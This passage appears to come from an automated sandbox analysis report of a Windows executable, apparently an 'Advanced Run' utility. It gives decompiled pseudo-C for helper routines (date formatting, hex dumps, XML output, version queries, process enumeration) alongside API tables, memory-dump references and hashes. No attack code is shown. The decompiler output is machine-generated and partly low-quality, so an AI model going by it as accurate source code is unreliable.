				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                                                                                                                                                                          0x00404ed0
                                                                                                                                                                                                                          0x00404edf
                                                                                                                                                                                                                          0x00404ef6
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00404f00
                                                                                                                                                                                                                          0x00404f1c
                                                                                                                                                                                                                          0x00404f31
                                                                                                                                                                                                                          0x00404f41
                                                                                                                                                                                                                          0x00404f4e
                                                                                                                                                                                                                          0x00404f5d
                                                                                                                                                                                                                          0x00404f66
                                                                                                                                                                                                                          0x00404f69
                                                                                                                                                                                                                          0x00404f69
                                                                                                                                                                                                                          0x00404f71
                                                                                                                                                                                                                          0x00404f77
                                                                                                                                                                                                                          0x00404f7d

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404F41
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00404F4E
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00404F5D
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404F71
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1331804452-0
                                                                                                                                                                                                                          • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                                                                                                                          • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                                                          			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                                                                                                                                          0x00404fe0
                                                                                                                                                                                                                          0x00404fe9
                                                                                                                                                                                                                          0x00405000
                                                                                                                                                                                                                          0x00405005
                                                                                                                                                                                                                          0x00405009
                                                                                                                                                                                                                          0x0040500c
                                                                                                                                                                                                                          0x0040500e
                                                                                                                                                                                                                          0x00405015
                                                                                                                                                                                                                          0x00405016
                                                                                                                                                                                                                          0x00405021
                                                                                                                                                                                                                          0x00405026
                                                                                                                                                                                                                          0x00405027
                                                                                                                                                                                                                          0x0040502c
                                                                                                                                                                                                                          0x00405031
                                                                                                                                                                                                                          0x00405039
                                                                                                                                                                                                                          0x0040503f
                                                                                                                                                                                                                          0x00405044
                                                                                                                                                                                                                          0x00405048
                                                                                                                                                                                                                          0x0040504e
                                                                                                                                                                                                                          0x00405056
                                                                                                                                                                                                                          0x0040505c
                                                                                                                                                                                                                          0x0040504e
                                                                                                                                                                                                                          0x00405065
                                                                                                                                                                                                                          0x0040506a
                                                                                                                                                                                                                          0x00405072
                                                                                                                                                                                                                          0x00405079

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                                                                                                                          • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                                                                                                                          • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                                                                                                          			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                                                                                                                                                                          0x00407d9c
                                                                                                                                                                                                                          0x00407d9e
                                                                                                                                                                                                                          0x00407da5
                                                                                                                                                                                                                          0x00407db3
                                                                                                                                                                                                                          0x00407dba
                                                                                                                                                                                                                          0x00407dc5
                                                                                                                                                                                                                          0x00407dc7
                                                                                                                                                                                                                          0x00407dd0
                                                                                                                                                                                                                          0x00407dc9
                                                                                                                                                                                                                          0x00407dc9
                                                                                                                                                                                                                          0x00407dc9
                                                                                                                                                                                                                          0x00407dd8
                                                                                                                                                                                                                          0x00407de1
                                                                                                                                                                                                                          0x00407de5
                                                                                                                                                                                                                          0x00407deb
                                                                                                                                                                                                                          0x00407df2
                                                                                                                                                                                                                          0x00407df3
                                                                                                                                                                                                                          0x00407dfe
                                                                                                                                                                                                                          0x00407e03
                                                                                                                                                                                                                          0x00407e04
                                                                                                                                                                                                                          0x00407e21

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                                                                                                                          • <%s>, xrefs: 00407DF3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                          • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                                                                                                                          • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                          			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                                                                                                                                                                          0x00403b56
                                                                                                                                                                                                                          0x00403b5d
                                                                                                                                                                                                                          0x00403b6f
                                                                                                                                                                                                                          0x00403b76
                                                                                                                                                                                                                          0x00403b82
                                                                                                                                                                                                                          0x00403b8d
                                                                                                                                                                                                                          0x00403b8e
                                                                                                                                                                                                                          0x00403b99
                                                                                                                                                                                                                          0x00403b9e
                                                                                                                                                                                                                          0x00403b9f
                                                                                                                                                                                                                          0x00403ba7
                                                                                                                                                                                                                          0x00403bb9
                                                                                                                                                                                                                          0x00403bce
                                                                                                                                                                                                                          0x00403be5
                                                                                                                                                                                                                          0x00403bef
                                                                                                                                                                                                                          0x00403bf8
                                                                                                                                                                                                                          0x00403c00

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403B5D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403B76
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                            • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                                                                                                                                            • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                                                                                                                            • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                                                                                                                            • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                                                                                                                          • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                                                                                                                          • API String ID: 1832587304-479876776
                                                                                                                                                                                                                          • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                                                                                                                          • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                                                                                                                                                                          0x0040afd3
                                                                                                                                                                                                                          0x0040afe2
                                                                                                                                                                                                                          0x0040aff3
                                                                                                                                                                                                                          0x0040b002
                                                                                                                                                                                                                          0x0040b023
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040b047
                                                                                                                                                                                                                          0x0040b02e
                                                                                                                                                                                                                          0x0040b034
                                                                                                                                                                                                                          0x0040b03c
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040B002
                                                                                                                                                                                                                          • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                            • Part of subcall function 004049A2: lstrcpyW.KERNEL32(?,?), ref: 004049B7
                                                                                                                                                                                                                            • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                                                                                                                          • API String ID: 393120378-2245444037
                                                                                                                                                                                                                          • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                                                                                                                          • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                                                                                                                          • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                                                                                                                          • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 38%
                                                                                                                                                                                                                          			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0) {
					L12:
					__eflags =  *0x4101b8 - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E00409510(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x4101bc - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x40f840() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
										E0040920A( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x40f844() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E00409510(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}


























                                                                                                                                                                                                                          0x004092f3
                                                                                                                                                                                                                          0x004092fb
                                                                                                                                                                                                                          0x00409303
                                                                                                                                                                                                                          0x00409305
                                                                                                                                                                                                                          0x00409310
                                                                                                                                                                                                                          0x00409433
                                                                                                                                                                                                                          0x00409433
                                                                                                                                                                                                                          0x00409439
                                                                                                                                                                                                                          0x0040943f
                                                                                                                                                                                                                          0x00409445
                                                                                                                                                                                                                          0x0040944b
                                                                                                                                                                                                                          0x0040944e
                                                                                                                                                                                                                          0x00409452
                                                                                                                                                                                                                          0x00409466
                                                                                                                                                                                                                          0x0040946e
                                                                                                                                                                                                                          0x00409475
                                                                                                                                                                                                                          0x004094f7
                                                                                                                                                                                                                          0x004094f7
                                                                                                                                                                                                                          0x004094f9
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409488
                                                                                                                                                                                                                          0x00409494
                                                                                                                                                                                                                          0x004094a5
                                                                                                                                                                                                                          0x004094a9
                                                                                                                                                                                                                          0x004094b5
                                                                                                                                                                                                                          0x004094c3
                                                                                                                                                                                                                          0x004094c6
                                                                                                                                                                                                                          0x004094d5
                                                                                                                                                                                                                          0x004094dc
                                                                                                                                                                                                                          0x004094e1
                                                                                                                                                                                                                          0x004094e3
                                                                                                                                                                                                                          0x004094f1
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004094f1
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004094e3
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004094f7
                                                                                                                                                                                                                          0x00409452
                                                                                                                                                                                                                          0x00409316
                                                                                                                                                                                                                          0x00409316
                                                                                                                                                                                                                          0x0040931c
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409322
                                                                                                                                                                                                                          0x0040932b
                                                                                                                                                                                                                          0x00409333
                                                                                                                                                                                                                          0x00409337
                                                                                                                                                                                                                          0x00409341
                                                                                                                                                                                                                          0x00409342
                                                                                                                                                                                                                          0x0040934e
                                                                                                                                                                                                                          0x0040934f
                                                                                                                                                                                                                          0x00409358
                                                                                                                                                                                                                          0x0040935e
                                                                                                                                                                                                                          0x0040935e
                                                                                                                                                                                                                          0x00409363
                                                                                                                                                                                                                          0x0040936b
                                                                                                                                                                                                                          0x0040936d
                                                                                                                                                                                                                          0x00409377
                                                                                                                                                                                                                          0x00409385
                                                                                                                                                                                                                          0x0040938d
                                                                                                                                                                                                                          0x0040939d
                                                                                                                                                                                                                          0x004093a5
                                                                                                                                                                                                                          0x004093ac
                                                                                                                                                                                                                          0x004093b4
                                                                                                                                                                                                                          0x004093c5
                                                                                                                                                                                                                          0x004093c9
                                                                                                                                                                                                                          0x004093da
                                                                                                                                                                                                                          0x004093df
                                                                                                                                                                                                                          0x004093e5
                                                                                                                                                                                                                          0x004093e6
                                                                                                                                                                                                                          0x004093ea
                                                                                                                                                                                                                          0x004093f6
                                                                                                                                                                                                                          0x004093fc
                                                                                                                                                                                                                          0x00409407
                                                                                                                                                                                                                          0x00409407
                                                                                                                                                                                                                          0x0040941d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409423
                                                                                                                                                                                                                          0x00409428
                                                                                                                                                                                                                          0x00409375
                                                                                                                                                                                                                          0x00409375
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040942e
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409428
                                                                                                                                                                                                                          0x00409377
                                                                                                                                                                                                                          0x0040936d
                                                                                                                                                                                                                          0x004094fb
                                                                                                                                                                                                                          0x004094ff
                                                                                                                                                                                                                          0x004094ff
                                                                                                                                                                                                                          0x00409337
                                                                                                                                                                                                                          0x0040931c
                                                                                                                                                                                                                          0x0040950f

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040938D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040939D
                                                                                                                                                                                                                            • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409488
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004094A9
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3300951397-0
                                                                                                                                                                                                                          • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                                                                                                                          • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
